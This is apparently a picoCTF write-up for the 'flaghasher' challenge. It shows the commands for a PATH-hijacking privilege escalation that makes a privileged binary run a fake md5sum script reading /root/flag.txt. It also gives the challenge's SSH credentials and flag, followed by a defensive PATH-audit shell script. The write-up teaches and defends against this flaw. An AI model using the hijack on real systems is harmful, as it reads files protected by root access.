Description
The flaghasher binary runs with elevated privileges but only prints the output of `md5sum /root/flag.txt`. Hijack PATH so that `md5sum` resolves to your own script, which cats the flag.
Setup
SSH to shape-facility.picoctf.net -p 51426 (password 8d076785) and inspect `flaghasher`.
Copy the binary locally if desired, but you can exploit it directly on the remote host.
```bash
ssh -p 51426 ctf-player@shape-facility.picoctf.net
echo "/bin/cat /root/flag.txt" > md5sum && chmod +x md5sum
export PATH=.:$PATH && ./flaghasher
```
Solution
- Step 1: Discover the helper call. `strings flaghasher` reveals `/bin/bash -c 'md5sum /root/flag.txt'`. Because md5sum is resolved via PATH, you can substitute your own executable.
- Step 2: Drop in a fake md5sum. Create a script named md5sum that simply calls `/bin/cat /root/flag.txt`, mark it executable, and `export PATH=.:$PATH`. Running flaghasher now prints the flag instead of a hash.
Flag
picoCTF{sy5teM_b!n@riEs_4r3_5c@red_0f_yoU_bfa4...}
Classic PATH hijacking, so always check PATH order when privileged scripts invoke system tools.
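
The PATH-order check from the closing advice, as an added example that is not part of the original write-up: `audit_path` flags entries where an unprivileged user can plant a file, and `first_match` shows which file a bare command name such as `md5sum` resolves to. Both function names are hypothetical, and the world-writable test assumes a `find` that supports `-maxdepth`.

```shell
#!/bin/sh
# Added example: defensive checks for the PATH a privileged helper inherits.

# audit_path PATH_VALUE
# Prints "index<TAB>entry<TAB>reason" for each entry that allows shadowing.
# The body is a subshell, so its variables do not leak into the caller.
audit_path() (
    rest="$1:" idx=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}; rest=${rest#*:}; idx=$((idx + 1))
        case $entry in
            '') printf '%s\t%s\t%s\n' "$idx" '(empty)' 'empty entry means current directory' ;;
            /*) # Absolute entry: risky only if any user can create files in it.
                if [ -d "$entry" ] &&
                   [ -n "$(find "$entry" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
                    printf '%s\t%s\t%s\n' "$idx" "$entry" 'world-writable directory'
                fi ;;
            *)  printf '%s\t%s\t%s\n' "$idx" "$entry" 'relative entry resolves against cwd' ;;
        esac
    done
)

# first_match CMD PATH_VALUE
# Prints the file a shell would run for a bare CMD under PATH_VALUE,
# or exits the subshell with status 1 when nothing matches.
first_match() (
    cmd=$1 rest="$2:"
    while [ -n "$rest" ]; do
        dir=${rest%%:*}; rest=${rest#*:}
        [ -n "$dir" ] || dir=.
        if [ -f "$dir/$cmd" ] && [ -x "$dir/$cmd" ]; then
            printf '%s\n' "$dir/$cmd"
            exit 0
        fi
    done
    exit 1
)

# Report on the PATH of the current session.
audit_path "$PATH"
```

A helper that calls `/usr/bin/md5sum` by absolute path, or resets PATH to a fixed list of root-owned directories before running anything, leaves `first_match` with only one possible answer.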